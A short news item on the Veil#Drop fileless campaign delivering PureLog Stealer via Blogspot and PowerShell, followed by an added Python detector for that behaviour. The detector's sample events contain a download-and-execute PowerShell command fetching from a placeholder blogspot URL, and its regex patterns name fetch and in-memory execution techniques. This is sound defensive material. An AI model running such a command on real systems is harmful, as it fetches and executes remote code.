www.infosecurity-magazine.com 7/1/2026, 2:41:18 PM · external

Veil#Drop fileless malware uses Blogspot to drop PureLog Stealer

A fileless malware framework, dubbed Veil#Drop, has exploited Google's Blogspot to deploy the PureLog Stealer entirely in memory, enabling attackers to steal credentials without leaving conventional traces on disk. According to Securonix Threat Research, the attack involves a sequence of compromised websites alongside a malicious JavaScript file that activates PowerShell to fetch further instructions directly from Blogspot.

This approach circumvents traditional detection methods by blending malicious traffic with legitimate web activity. The PureLog Stealer targets a wide range of sensitive data, such as browser passwords and session cookies, which poses significant security risks, including the bypass of multi-factor authentication. Securonix advised defenders to monitor for suspicious PowerShell behavior rather than relying solely on static indicators of compromise.
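As an added illustration (not code from Securonix or the article), the sketch below scores process-creation events for the behaviour described above: PowerShell started by a script host, fetching from a Blogspot URL and running the result in memory. The event field names, the choice of Windows Script Host as the parent, the threshold and the sample events are assumptions constructed for the example.

```python
import re

# Assumption: .js files are launched by Windows Script Host; the page only
# says "a malicious JavaScript file", not which host ran it.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
FETCH = re.compile(r"invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b|"
                   r"downloadstring|downloaddata|net\.webclient", re.I)
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|reflection\.assembly|"
                       r"-enc(odedcommand)?\b", re.I)
BLOGSPOT = re.compile(r"https?://[\w.-]+\.blogspot\.com", re.I)

def exe_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the behavioural reasons a process-creation event looks suspicious."""
    if exe_name(ev["image"]) not in POWERSHELL:
        return []
    cmd = ev["command_line"]
    checks = [
        ("script-host parent", exe_name(ev["parent_image"]) in SCRIPT_HOSTS),
        ("web fetch", bool(FETCH.search(cmd))),
        ("in-memory execution", bool(IN_MEMORY.search(cmd))),
        ("blogspot url", bool(BLOGSPOT.search(cmd))),
    ]
    return [name for name, hit in checks if hit]

def detect(events, threshold=3):
    """Flag events where several weak signals coincide; none alerts alone."""
    scored = ((ev["host"], score_event(ev)) for ev in events)
    return [(host, reasons) for host, reasons in scored if len(reasons) >= threshold]

# Constructed sample events (hypothetical field names, placeholder URL).
SAMPLE_EVENTS = [
    {"host": "WS-01", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('https://placeholder.blogspot.com/p/x.html')\""},
    {"host": "WS-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"host": "WS-03", "parent_image": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": "pwsh.exe -c \"Invoke-WebRequest https://github.com/ -OutFile x\""},
]

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

Because Blogspot is a legitimate service, the URL match only adds weight alongside the parent-process and in-memory signals; it is not treated as an indicator on its own.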

Article by CyberSIXT